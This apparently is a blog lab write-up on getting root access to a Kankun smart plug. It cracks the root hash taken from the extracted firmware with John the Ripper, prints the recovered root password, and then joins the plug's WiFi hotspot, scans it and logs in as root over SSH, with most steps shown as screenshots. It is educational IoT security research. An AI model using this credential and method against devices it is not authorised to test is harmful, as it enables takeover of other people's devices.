CRACKING THE ROOT PASSWORD AND CONNECTING VIA SSH TO THE KANKUN SMART PLUG
- Layout for this exercise:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQQxA6MeJaX30Ae6PreMTzxSGa6wF-CRnavXIH-k0DAJMOJJbTm43ASRKpFhRyhySnbcJPyB-CjeP_KOwEEskgdS_wDuH1CqrL8sCrNd1Zvu01Vms8msVu-6YMswdEtO8XReY3dTDLgA62/s640/screenshot.14.jpg)
1 - Cracking the root password with John The Ripper
- This exercise is based on the previous one, where the firmware of Kankun Smart Plug was extracted:
https://dgmsp.blogspot.com/2017/05/11-extracting-and-analyzing-firmware-of.html
- Checking the interesting contents of the file system, for instance the passwords file /etc/passwd:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXSkIUWEoZTPIXSVZkSQRwJ6-IjLPw06bqOO2uF5Vs9pYR39ShzdkMNSUJlUdXvBj8exB9FDnXHpbRwP69zhvxTVqR60gVXhG16f3l5Lp_4l_NT5bE7WYaGUm8sGL1SS9CuY90R3SWymlw/s1600/screenshot.4.jpg)
- Also, the encrypted file for passwords is /etc/shadow:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuMay5gtLpH3wz6P78RuiBiKxbwnaIQVykUxUEU1FHFExbHTilVaz_KEF-0sAxJdaMJIsxmKyf0oD_ElOox448GJuQDgN8RhwigRaaVAcr9bFfTgm8Htpg8v4gFl_qhF7A5m_uB92YyRSY/s1600/screenshot.21.jpg)
- Before using John The Ripper to decrypt the passwords, let's unshadow /etc/passwd and /etc/shadow creating a file test:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvKCdpjztOqvRPDMfAQfFwAjACG15iFf57i3MUpr3KfU6xQlESi_3My0j8nw_0zjMUq4wtPdEYogLivmOp8dHYJBMsgkeJ0u6uumsKWJ1b2T4Db8MT3OvvFguAqKvchd41h3umIYDvJoHa/s1600/screenshot.4.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhk8C8xFwd02kJoIm4ddAviqUYL8IdZ3z-I6u6FOCeBq98rhTV29Q4nGmOLF6fIqgEijYJuowKOAwQwx-MXE4hFMhYsgtDmm3RYvSWLzpBTZ_N3HaqCXik6gWbrsdYKaduTgK859GdIreYg/s1600/screenshot.1.jpg)
- unshadow combines /etc/passwd and /etc/shadow:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHE3sVceJui5wmqoovT7GzylCs0pEdEpzo9BjeN0HXAg794Q7L2tWpycwic4cTEQe0lcYS5n8bfA8Pl2ZZkgL3g7LWfj3CS6bcCgXP_oBvm-_en05hjqpDxB-YiVBYrP1lbynJZWjW0E_z/s1600/screenshot.3.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyOE4PpoxE_EluGZzxG9FiBPWJa9WNaleytJVddMoe2C7txazXjClezNJhumMrG402z7NLgQoqkQwttlAgZDQPKiorQ0fNwYkyaWQhALuXa1Rfx9RgWGiSWCOUr1roE01jy5tj9QPQh2Bp/s1600/screenshot.2.jpg)
- Using John The Ripper for decryption, the root password is p9z34c:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDTDtAR5RhcKbCmXjDDgLhVEzwg8vevmEruxG8t1aGSkDtwQa-1MAOx0_fvIMkG7kId-TpzTwZde3501GlHD1Ct1-2G_iHKAy65oWuEBJ9xyu5XEuPgbZUSVtBr3dUzSCjz7Xp_uZ3aNCr/s1600/screenshot.5.jpg)
2 - Connecting to the network created by Kankun Smart Plug
- When the Smart Plug is plugged, and after 20 seconds of solid blue light, it starts blinking slowly:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu791Fk8oB2vx_85CWMvaGmQdlQip10bqhjKcUgcXEg6tTDfKhHknDNeeu4DGrAJzlopXB1wBxRY0yEExMSyziJmMxtO7cy1LRfdJiFXa47Oa-zr4v3413IrPw5gLU8_6XQszbCuWjeTjT/s320/screenshot.16.jpg)
- At that time Kankun works as a hotspot or Access Point creating a WiFi network of SSID OK_SP3.
- The device used in this exercise is an Ubuntu virtual machine hosted by a Windows 10, what detects the newly created WiFi network OK_SP3:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggzu0qafgbnKFgUgmewevEyfoU5Ihb3sHkQ8qh-MOi9R3uFrA_Ev8n7UXldb9Aoat2teaGTE_Kvz5g5x4V7h4hcYZbXNKxaBOYnr75NNAxyULnD32WDKsh3LbOSUV-W4yYQJTDqyV1nDYN/s640/screenshot.6.jpg)
- The characteristics of the wireless network OK_SP3:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSJnnaDVyN_YQirSVhC2rxJuOGG-FCtmPlcJqQ9O178sr7A1K6CbFbjIqbeYImQ2TrU445aesjtaH4-soWdR4BxLGgaEuRnAYPtytm0cOQGQiAknAkA-eBBJnUZID3d_84ogYcyBGTJ9p3/s1600/screenshot.7.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLARS_-QQakIMIoy2-yq6jMrO3uN3ZnmYCF0c1LZ5NStGWhzykPt2212UAP_RhfdKIQ6Vc3cCfeuxrhTOgPhttRHi01Yt8-5SRHp29sVrlPYuC9u0q_-UTPuSnfhY9k_OtwquhyNFT064S/s1600/screenshot.8.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZQIM1l7VePL9OtjrgNGV1M7GcebhQ7lsU4UCMnuJ3_rH2Xyo98xHKEnKvq69C0uHzZWtxGzGArMEBELppJTZwOlOGj-6UieVqYjvP5OpOkKRS7FHv8y5BYUqQgZvUeTiLEOVsKw011JJE/s1600/screenshot.9.jpg)
- The Virtual Machine is attached with the mode Bridged Adapter, so that it is networked directly to OK_SP3:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbjbw9E8ncS8fy_MXVa2Xl78rc5hnrVC3xBbMZmc70QGehSeprjm69e2UMefwcm8l8lTFfwOGTlxuSKlp3DdRlgpPRT57K9THt5pSdU_bDxoyMHYMDNXhroVudQcypsA16JlaIyd6fDnmO/s1600/screenshot.1.jpg)
- Once inside the Ubuntu virtual machine we notice that Kankun (acting as Access Point) assigns an IP 192.168.10.140 to Ubuntu:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSgeGyRi0H6QVIrRivN52Kj5LYA3nCaSNq2Fsi1IIOkiMdyRoLGol01_UrfF-F8L0AEXwzBLxd1GNMBzTpkcjO8n5kHmmMkhGgjkb2I3dvo7XcQpGV_4u34mxW3VlVRpiU6Z4MI-W-eqyQ/s1600/screenshot.3.jpg)
3- Accessing via SSH
- From Ubuntu, connected to the network (192.168.10.0/24) of the hotspot Kankun, let's discover any other host:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXL140XnL9LEXjKEaYKXDYFsHsBhTQIum0uoM5XXc7JxIhxGjOHYLS-myWbPQRtw7X69m0YY0p97ENz2fYtkpZjD5LoAKXBBEfQs6Oiygnos8jGTWbnJth75O0sOoH3AhRUGRQNvg0kh2Q/s1600/screenshot.4.jpg)
- The host 192.168.10.253 corresponds to the Kankun Smart Plug, acting as gateway for all possible connected devices to OK_SP3. Pinging it from Ubuntu:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-rIbrcVmFfwM4-2v4V6zdHJ-1sVoEd6Ck7Yk0-jAbcnF6k6X92euiLdoJeUOQ4edqDqJaamQCn0odIEr7-OtckCEZgQf0R8JuJAbZLB4-nKEpG3_3ahMdx8blNsmrdqOsbPjG3Sw1PKTD/s1600/screenshot.5.jpg)
- Let's scan ports of Kankun:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQLxVJEafkQX1Lp8X7fUMvpqO364BIa85VbKD2Uh0cTV0o5BWfHaZAPUnMJf4o0gt4Kp-3sJDbgzyYBP-0j-Zq6sJimhlRjBeFmzG6tfugZD_pFisR8a4P_ZFmYgtr4RaELGq-GmKc3mGp/s1600/screenshot.10.jpg)
- Once detected that SSH port 22 is open, let's try to connect to Kankun via SSH, taking advantage that we know the root password of the device (p9z34c):
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrp6d87uohXZMoeGsPQ0x462esuJSJfYuQGWhJmLtnMnlJP8vSrBUvnfngYWXLcY8f_A31HvLUb5Y4jyHhkEONDlhtaUSyRC9ru-Z_Ek6wYFUfVEyZ7I01ZYMNAGDQ3y5DO4bw2AuvPKfr/s1600/screenshot.11.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh77eZ8mthGvSqpYeGLJ0TvXBqghBCCq7IXSdCINCHXl-TqoNUXmgPg7aFGhtF53qlAGcQ0tkBpC5JbrJCrKJKz5H_wbYps0hCA5eveOA-CRF_jd9R4yPtB1ZE8ddnB4zIl_SJYDxSLkK7/s1600/screenshot.12.jpg)
- The connection has all the privileges of the user root:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6OIDTzygcEhOud2UzOTrXz6lRm0tVBuIsSqir8PSfwXoYrLwOQf-AEvfA9kOVFaElWpnp1aSn0-eNv0Lj3KlcTMxHgScpSW2RfRgND2HeRkaAxRC9g7pB9iVrn07mUEsrc5TPltBEjou5/s400/screenshot.13.jpg)
- Checking the IP of Kankun:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTw5pZlcepBEpTbjcEmcg5OMNJGOxc2X-Mtg-VYxJ_4t9pL-S7srmlzvnTo3MnILKeIJLNvQCP5XZEYJ7EB8wHlUYvAeC99v8nteMGYCWpAUAB0YPgPdJrqD76iYixGQYRNquoCIzLePvm/s1600/screenshot.14.jpg)
- We have access to the whole root file system of the Kakun Smart Plug:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBb-cYfwvc9zvHl8t2cx-ew0eCWoavsoGMRS8XF2wFhOe-aC8DkJHSKV4E6F982r8f2DOfP6QXhcZUSLs02stZy0q4Hr5JpYtKFs1HHo9qCgay2Cxxoil9CSDq7_jpRwu6jzkgtRrdozC3/s1600/screenshot.15.jpg)